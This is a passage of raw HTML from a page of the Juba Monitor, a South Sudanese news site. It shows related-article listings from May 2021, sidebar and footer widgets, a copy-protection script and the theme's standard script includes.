class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Fpolice-in-hot-pursuit-of-juba-yei-road-killer-gang%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fpolice-in-hot-pursuit-of-juba-yei-road-killer-gang%2F&amp;title=POLICE-In+hot+pursuit+of+Juba-Yei+road+killer+gang" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=POLICE-In+hot+pursuit+of+Juba-Yei+road+killer+gang&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Fpolice-in-hot-pursuit-of-juba-yei-road-killer-gang%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--><div class="post-outer"><article class="post-wrap post-list-1 clearfix"><div class="post-list-inner"><div class="col-sm-6 col-left"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/involvewomenin-social-decision-making/" title="Involvewomenin social decision making" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="365" height="291" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/Some-of-the-young-girls-during-sensitization-training-in-Juba-365x291.jpg" class="attachment-bingo_ruby_crop_365x330 size-bingo_ruby_crop_365x330 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div></div><div class="col-sm-6 col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/involvewomenin-social-decision-making/" rel="bookmark" title="Involvewomenin social decision making">Involvewomenin social decision making</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' /><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-05-03T06:38:00+00:00">03/05/2021</time><time class="updated" datetime="2021-05-02T18:20:38+03:00">02/05/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By Correspondent Active Citizen South Sudan, youth advocacy organization is calling on the communities to prioritize economics and social contribution...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Finvolvewomenin-social-decision-making%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=Involvewomenin+social+decision+making&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Finvolvewomenin-social-decision-making%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Finvolvewomenin-social-decision-making%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Finvolvewomenin-social-decision-making%2F&amp;title=Involvewomenin+social+decision+making" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=Involvewomenin+social+decision+making&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Finvolvewomenin-social-decision-making%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--><div class="post-outer"><article class="post-wrap post-list-1 clearfix"><div class="post-list-inner"><div class="col-sm-6 col-left"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/airline-denies-benefiting-from-oil-money-illegally/" title="Airline denies benefiting from oil money illegally" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="365" height="330" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/Duang-Ayii-the-Chief-Executive-Officer-for-South-Supreme-Airlines-365x330.jpg" class="attachment-bingo_ruby_crop_365x330 size-bingo_ruby_crop_365x330 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div></div><div class="col-sm-6 col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/airline-denies-benefiting-from-oil-money-illegally/" rel="bookmark" title="Airline denies benefiting from oil money illegally">Airline denies benefiting from oil money illegally</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' /><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-05-03T06:37:58+00:00">03/05/2021</time><time class="updated" datetime="2021-05-02T18:19:19+03:00">02/05/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By Wek Atak Kacjang The management of South Supreme Airlines limited has denied the report that the Airline was benefiting...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fairline-denies-benefiting-from-oil-money-illegally%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=Airline+denies+benefiting+from+oil+money+illegally&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fairline-denies-benefiting-from-oil-money-illegally%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Fairline-denies-benefiting-from-oil-money-illegally%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fairline-denies-benefiting-from-oil-money-illegally%2F&amp;title=Airline+denies+benefiting+from+oil+money+illegally" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=Airline+denies+benefiting+from+oil+money+illegally&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Fairline-denies-benefiting-from-oil-money-illegally%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--><div class="post-outer"><article class="post-wrap post-list-1 clearfix"><div class="post-list-inner"><div class="col-sm-6 col-left"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/studentsleadership-dissolved/" title="Students’leadership dissolved" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="365" height="330" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/Students’-Union-leadership-posed-for-group-photo-after-dissolution-of-leadership-365x330.jpg" class="attachment-bingo_ruby_crop_365x330 size-bingo_ruby_crop_365x330 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div></div><div class="col-sm-6 col-right"><div class="post-body"><div class="post-list-content"><div class="post-cat-info clearfix"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--><h2 class="post-title entry-title is-size-3"><a class="post-title-link" href="https://www.jubamonitor.com/studentsleadership-dissolved/" rel="bookmark" title="Students’leadership dissolved">Students’leadership dissolved</a></h2><!--#post title--><div class="post-meta-info is-show-icon"><div class="post-meta-info-left"><span class="meta-info-el meta-info-author vcard author"><img alt='adminjubamonitor' src='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=22&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/8934503dc3b7d7df1462cb8f36751fe1?s=44&#038;d=mm&#038;r=g 2x' class='avatar avatar-22 photo' height='22' width='22' /><a class="url fn n" href="https://www.jubamonitor.com/author/adminjubamonitor/">adminjubamonitor</a></span><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-05-03T06:36:56+00:00">03/05/2021</time><time class="updated" datetime="2021-05-02T18:18:11+03:00">02/05/2021</time></span><!--#meta info date--></div><!--#post meta info left--></div><!--#post meta info--><div class="post-excerpt">By Martin Manyiel Wugol in Kampala. The leadership of South Sudanese Students Union in Uganda yesterday was dissolved at the...</div><!--#excerpt--></div><div class="post-meta-info-share clearfix"><div class="post-meta-share-inner is-relative"><div class="social-sharing"><a class="share-bar-el icon-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.jubamonitor.com%2Fstudentsleadership-dissolved%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-facebook color-facebook"></i></a><a class="share-bar-el icon-twitter" href="https://twitter.com/intent/tweet?text=Students%E2%80%99leadership+dissolved&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fstudentsleadership-dissolved%2F&amp;via=Juba+Monitor"><i class="fa fa-twitter color-twitter"></i></a> <a class="share-bar-el icon-google" href="https://plus.google.com/share?url=https%3A%2F%2Fwww.jubamonitor.com%2Fstudentsleadership-dissolved%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-google color-google"></i></a><a class="share-bar-el icon-linkedin" href="https://linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fwww.jubamonitor.com%2Fstudentsleadership-dissolved%2F&amp;title=Students%E2%80%99leadership+dissolved" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="fa fa-linkedin"></i></a><a class="share-bar-el icon-email" href="mailto:?subject=Students%E2%80%99leadership+dissolved&BODY=I+found+this+article+interesting+and+thought+of+sharing+it+with+you.+Check+it+out%3Ahttps%3A%2F%2Fwww.jubamonitor.com%2Fstudentsleadership-dissolved%2F"><i class="fa fa-envelope"></i></a></div></div></div></div></div></div></article></div><!--#post outer--></div><!--#related content--></div></div><!--#single post box outer --></div><!--#page--><aside class="sidebar-wrap col-sm-4 col-xs-12 clearfix" ><div class="ruby-sidebar-sticky"><div class="sidebar-inner"><section id="text-5" class="widget widget_text"><div class="widget-title block-title"><h3>About us in brief</h3></div>			<div class="textwidget"><p><img src="https://www.jubamonitor.com/wp-content/uploads/2016/07/cropped-front.png"/><br />
The Juba Monitor is an independent newspaper based in South Sudan's capital, Juba.</p>
</div>
		</section><section id="bingo_ruby_sb_social_counter_widget-2" class="widget sb-widget sb-widget-social-counter"><div class="widget-title block-title"><h3>stay connected</h3></div>
		<div class="widget-content-wrap">
			<div class="sb-social-counter social-counter-wrap style-1">

				                    <div class="counter-element bg-facebook">
                        <a target="_blank" href="http://facebook.com/TheJubaMonitor" class="facebook" title="facebook">
							<span class="counter-element-inner">
								<i class="fa fa-facebook-square"></i>
								<span class="num-count">15.7K</span>
								<span class="text-count">fans</span>
							</span>
                                                    </a>
                    </div><!--facebook like count -->
                					<div class="counter-element bg-twitter">
						<a target="_blank" href="http://twitter.com/JubaMonitor" class="twitter" title="twitter">
							<span class="counter-element-inner">
								<i class="fa fa-twitter"></i>
								<span class="num-count">0</span>
								<span class="text-count">followers</span>
							</span>
													</a>
					</div><!--twitter follower count -->
				
			</div><!-- #social count wrap -->
		</div><!-- #widget content wrap -->

		</section><section id="bingo_ruby_fanpage_widget-4" class="widget sb-widget sb-widget-fb"><div class="widget-title block-title"><h3>Find us on Facebook</h3></div>
			<div class="widget-content-wrap">
				<div class="fb-container">
					<div id="fb-root"></div>
					<script>(function(d, s, id) {
							var js, fjs = d.getElementsByTagName(s)[0];
							if (d.getElementById(id)) return;
							js = d.createElement(s); js.id = id;
							js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3&appId=1385724821660962";
							fjs.parentNode.insertBefore(js, fjs);
						}(document, 'script', 'facebook-jssdk'));</script>
					<div class="fb-page" data-href="http://facebook.com/TheJubaMonitor" data-hide-cover="false" data-show-facepile="true" data-show-posts="false"></div>
				</div>
			</div>

			</section><section id="bingo_ruby_sb_widget_post-2" class="widget sb-widget sb-widget-post"><div class="widget-title block-title"><h3>latest posts</h3></div><div class="widget-content-wrap"><div class="post-widget-inner style-6"><div class="is-top-row"><article class="post-wrap post-overlay-4"><div class="post-thumb-outer"><div class="post-thumb-overlay"></div><div class="is-bg-thumb post-thumb is-image"><a href="https://www.jubamonitor.com/police-in-hot-pursuit-of-juba-yei-road-killer-gang/" title="POLICE-In hot pursuit of Juba-Yei road killer gang" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="510" height="362" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/IGP-Gen.-Majak-Akec-Malok.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/05/IGP-Gen.-Majak-Akec-Malok.jpg 510w, https://www.jubamonitor.com/wp-content/uploads/2021/05/IGP-Gen.-Majak-Akec-Malok-300x213.jpg 300w" sizes="(max-width: 510px) 100vw, 510px" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div><div class="post-header-outer is-header-overlay is-absolute is-light-text"><div class="post-header"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/police-in-hot-pursuit-of-juba-yei-road-killer-gang/" rel="bookmark" title="POLICE-In hot pursuit of Juba-Yei road killer gang">POLICE-In hot pursuit of Juba-Yei road killer gang</a></h2><!--#post title--></div><!--#post header--></div></article></div><div class="post-outer"><article class="post-wrap post-list-4 clearfix"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/south-sudanese-cautioned-about-new-covid-19variant/" title="South Sudanese cautioned about new Covid-19variant" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="110" height="85" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/Bishop-Peter-MarialAgok-110x85.jpg" class="attachment-bingo_ruby_crop_110x85 size-bingo_ruby_crop_110x85 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div><div class="post-body"><h2 class="post-title entry-title is-size-6"><a class="post-title-link" href="https://www.jubamonitor.com/south-sudanese-cautioned-about-new-covid-19variant/" rel="bookmark" title="South Sudanese cautioned about new Covid-19variant">South Sudanese cautioned about new Covid-19variant</a></h2><!--#post title--><div class="post-meta-info post-meta-s"><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-05-03T06:38:02+00:00">03/05/2021</time><time class="updated" datetime="2021-05-02T18:23:08+03:00">02/05/2021</time></span><!--#meta info date--></div></div></article></div><div class="post-outer"><article class="post-wrap post-list-4 clearfix"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/involvewomenin-social-decision-making/" title="Involvewomenin social decision making" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="110" height="85" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/Some-of-the-young-girls-during-sensitization-training-in-Juba-110x85.jpg" class="attachment-bingo_ruby_crop_110x85 size-bingo_ruby_crop_110x85 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div><div class="post-body"><h2 class="post-title entry-title is-size-6"><a class="post-title-link" href="https://www.jubamonitor.com/involvewomenin-social-decision-making/" rel="bookmark" title="Involvewomenin social decision making">Involvewomenin social decision making</a></h2><!--#post title--><div class="post-meta-info post-meta-s"><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-05-03T06:38:00+00:00">03/05/2021</time><time class="updated" datetime="2021-05-02T18:20:38+03:00">02/05/2021</time></span><!--#meta info date--></div></div></article></div><div class="post-outer"><article class="post-wrap post-list-4 clearfix"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/airline-denies-benefiting-from-oil-money-illegally/" title="Airline denies benefiting from oil money illegally" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="110" height="85" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/Duang-Ayii-the-Chief-Executive-Officer-for-South-Supreme-Airlines-110x85.jpg" class="attachment-bingo_ruby_crop_110x85 size-bingo_ruby_crop_110x85 wp-post-image" alt="" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--></div><div class="post-body"><h2 class="post-title entry-title is-size-6"><a class="post-title-link" href="https://www.jubamonitor.com/airline-denies-benefiting-from-oil-money-illegally/" rel="bookmark" title="Airline denies benefiting from oil money illegally">Airline denies benefiting from oil money illegally</a></h2><!--#post title--><div class="post-meta-info post-meta-s"><span class="meta-info-el meta-info-date"><i class="fa fa-clock-o"></i><time class="date published" datetime="2021-05-03T06:37:58+00:00">03/05/2021</time><time class="updated" datetime="2021-05-02T18:19:19+03:00">02/05/2021</time></span><!--#meta info date--></div></div></article></div></div><!--#post widget inner --></div><!--#post widget content wrap --></section></div></div></aside></div><!--#page content--></article><!--#single post--></div></div>

		<footer id="footer" class="footer-wrap" >
						<div class="footer-inner is-light-text">
							<div class="column-footer-wrap">
				<div class="ruby-container row">
					<div class="column-footer-inner">
						<div class="sidebar-footer col-sm-4 col-xs-12" role="complementary">
							<section id="flexible-recent-posts-widget-5" class="widget widget_flexible-recent-posts-widget"><div class="frp-widget-wrapper frp-widget-">
	<div class="widget-title block-title"><h3>RECENT POSTS</h3></div>    <div class="frp-clear"></div>
    <ul class="frp-widget">
		        <li class="frp-news">
			<div class="frp-left">
	<a href="https://www.jubamonitor.com/police-in-hot-pursuit-of-juba-yei-road-killer-gang/"><img width="56" height="56" src="https://www.jubamonitor.com/wp-content/uploads/2021/05/IGP-Gen.-Majak-Akec-Malok-150x150.jpg" class="attachment-75x56 size-75x56 wp-post-image" alt="" srcset="https://www.jubamonitor.com/wp-content/uploads/2021/05/IGP-Gen.-Majak-Akec-Malok-150x150.jpg 150w, https://www.jubamonitor.com/wp-content/uploads/2021/05/IGP-Gen.-Majak-Akec-Malok-45x45.jpg 45w" sizes="(max-width: 56px) 100vw, 56px" /></a>
</div>
<div class="news-widget-info">
<div class="news-widget-title">
		<a href="https://www.jubamonitor.com/police-in-hot-pursuit-of-juba-yei-road-killer-gang/" class="news-widget-link">POLICE-In hot pursuit of Juba-Yei road killer gang</a>
	</div>
<div class="news-widget-elapsed">6 hours ago</div>
</div>
<div class="frp-clear"></div>
        </li>
		    </ul>
	    <div class="frp-all-category-news frp-all-category-news-footer"><a
            href="https://www.jubamonitor.com/category/weekly-state-news/">All news &gt;&gt;</a></div>
	</div>
</section>						</div>
						<div class="sidebar-footer col-sm-4 col-xs-12" role="complementary">
							<section id="bingo_ruby_sb_social_counter_widget-4" class="widget sb-widget sb-widget-social-counter"><div class="widget-title block-title"><h3>stay connected</h3></div>
		<div class="widget-content-wrap">
			<div class="sb-social-counter social-counter-wrap style-1">

				                    <div class="counter-element bg-facebook">
                        <a target="_blank" href="http://facebook.com/TheJubaMonitor" class="facebook" title="facebook">
							<span class="counter-element-inner">
								<i class="fa fa-facebook-square"></i>
								<span class="num-count">15.7K</span>
								<span class="text-count">fans</span>
							</span>
                                                    </a>
                    </div><!--facebook like count -->
                					<div class="counter-element bg-twitter">
						<a target="_blank" href="http://twitter.com/JubaMonitor" class="twitter" title="twitter">
							<span class="counter-element-inner">
								<i class="fa fa-twitter"></i>
								<span class="num-count">0</span>
								<span class="text-count">followers</span>
							</span>
													</a>
					</div><!--twitter follower count -->
				
			</div><!-- #social count wrap -->
		</div><!-- #widget content wrap -->

		</section>						</div>
						<div class="sidebar-footer col-sm-4 col-xs-12" role="complementary">
							<section id="bingo_ruby_fanpage_widget-3" class="widget sb-widget sb-widget-fb"><div class="widget-title block-title"><h3>Find us on Facebook</h3></div>
			<div class="widget-content-wrap">
				<div class="fb-container">
					<div id="fb-root"></div>
					<script>(function(d, s, id) {
							var js, fjs = d.getElementsByTagName(s)[0];
							if (d.getElementById(id)) return;
							js = d.createElement(s); js.id = id;
							js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3&appId=1385724821660962";
							fjs.parentNode.insertBefore(js, fjs);
						}(document, 'script', 'facebook-jssdk'));</script>
					<div class="fb-page" data-href="http://facebook.com/TheJubaMonitor" data-hide-cover="false" data-show-facepile="true" data-show-posts="false"></div>
				</div>
			</div>

			</section>						</div>
					</div>
				</div>
			</div><!--#footer columns-->
							
					<div class="bottom-footer-wrap">
				<div class="ruby-container">
											<div class="bottom-footer-inner">
															<div class="footer-logo">
									<a href="https://www.jubamonitor.com/" class="logo"
									   title="Juba Monitor">
										<img data-no-retina
										     src="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorLOGO.jpg"
										     height="90"
										     width="300"
										     alt="Juba Monitor">
									</a>
								</div>
																						<nav id="ruby-footer-navigation" class="footer-menu-wrap">
									<div class="menu-big-menu-container"><ul id="footer-nav" class="footer-menu-inner"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-9598"><a href="https://www.jubamonitor.com/">HOME</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-9582 is-category-23"><a href="https://www.jubamonitor.com/category/news-2/">News</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9584 is-category-5"><a href="https://www.jubamonitor.com/category/opinion/">Opinion</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9586 is-category-3"><a href="https://www.jubamonitor.com/category/cover-story/">Cover Story</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9587 is-category-10"><a href="https://www.jubamonitor.com/category/sports/">Sports</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9589 is-category-27"><a href="https://www.jubamonitor.com/category/business/">Business</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11765 is-category-61"><a href="https://www.jubamonitor.com/category/agriculture/agriculture-agriculture/">AGRICULTURE</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9590 is-category-33"><a href="https://www.jubamonitor.com/category/education/">Education</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9588 is-category-9"><a href="https://www.jubamonitor.com/category/entertainment/">Entertainment</a></li>
</ul></div>								</nav>
																				</div>
									</div>
									<div id="footer-copyright" class="footer-copyright-wrap">
						<p>Copyright © 2021 Juba Monitor. All Rights Reserved | Site Managed By: Henry Albert.</p>
					</div>
							</div>
						</div>
		</footer><!--#footer -->
	</div>
</div>
	<div id="wpcp-error-message" class="msgmsg-box-wpcp warning-wpcp hideme"><span>error: </span>Content is protected !!</div>
	<script>
	var timeout_result;
	function show_wpcp_message(smessage)
	{
		if (smessage !== "")
			{
			var smessage_text = '<span>Alert: </span>'+smessage;
			document.getElementById("wpcp-error-message").innerHTML = smessage_text;
			document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp showme";
			clearTimeout(timeout_result);
			timeout_result = setTimeout(hide_message, 3000);
			}
	}
	function hide_message()
	{
		document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp hideme";
	}
	</script>
		<style>
	@media print {
	body * { display: none !important;}
		body:after {
		content: "You are not allowed to print preview this page, Thank you"; }
	}
	</style>
		<style type="text/css">
	#wpcp-error-message {
	    direction: ltr;
	    text-align: center;
	    transition: opacity 900ms ease 0s;
	    z-index: 99999999;
	}
	.hideme {
    	opacity:0;
    	visibility: hidden;
	}
	.showme {
    	opacity:1;
    	visibility: visible;
	}
	.msgmsg-box-wpcp {
		border-radius: 10px;
		color: #555;
		font-family: Tahoma;
		font-size: 11px;
		margin: 10px;
		padding: 10px 36px;
		position: fixed;
		width: 255px;
		top: 50%;
  		left: 50%;
  		margin-top: -10px;
  		margin-left: -130px;
  		-webkit-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1);
		-moz-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1);
		box-shadow: 0px 0px 34px 2px rgba(242,191,191,1);
	}
	.msgmsg-box-wpcp span {
		font-weight:bold;
		text-transform:uppercase;
	}
	.error-wpcp {		background:#ffecec url('https://www.jubamonitor.com/wp-content/plugins/wp-content-copy-protector/images/error.png') no-repeat 10px 50%;
		border:1px solid #f5aca6;
	}
	.success {
		background:#e9ffd9 url('https://www.jubamonitor.com/wp-content/plugins/wp-content-copy-protector/images/success.png') no-repeat 10px 50%;
		border:1px solid #a6ca8a;
	}
	.warning-wpcp {
		background:#ffecec url('https://www.jubamonitor.com/wp-content/plugins/wp-content-copy-protector/images/warning.png') no-repeat 10px 50%;
		border:1px solid #f5aca6;
	}
	.notice {
		background:#e3f7fc url('https://www.jubamonitor.com/wp-content/plugins/wp-content-copy-protector/images/notice.png') no-repeat 10px 50%;
		border:1px solid #8ed9f6;
	}
    </style>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/auto-image-alt/js/auto_image_alt.js?ver=1.1'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/bingo-ruby-core/assets/script.js?ver=1.6'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/www.jubamonitor.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.4'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-modernizr.js?ver=v2.8.3'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-totop.js?ver=v1.2'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-waypoints.js?ver=v3.1.1'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-slick.js?ver=v1.5.8'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-tipsy.js?ver=v1.0'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-magnificpopup.js?ver=v1.1.0'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-justified.js?ver=v1.1.0'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-backstretch.js?ver=v2.0.4'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-smoothscroll.js?ver=v1.2.1'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-bootstrap.js?ver=v3.0'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-fitvids.js?ver=v1.1'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-sticky.js?ver=v1.0.3'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/lib-rubysticky.js?ver=1.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var bingo_ruby_to_top = "1";
var bingo_ruby_social_tooltip = "1";
var bingo_ruby_single_image_popup = "1";
/* ]]> */
</script>
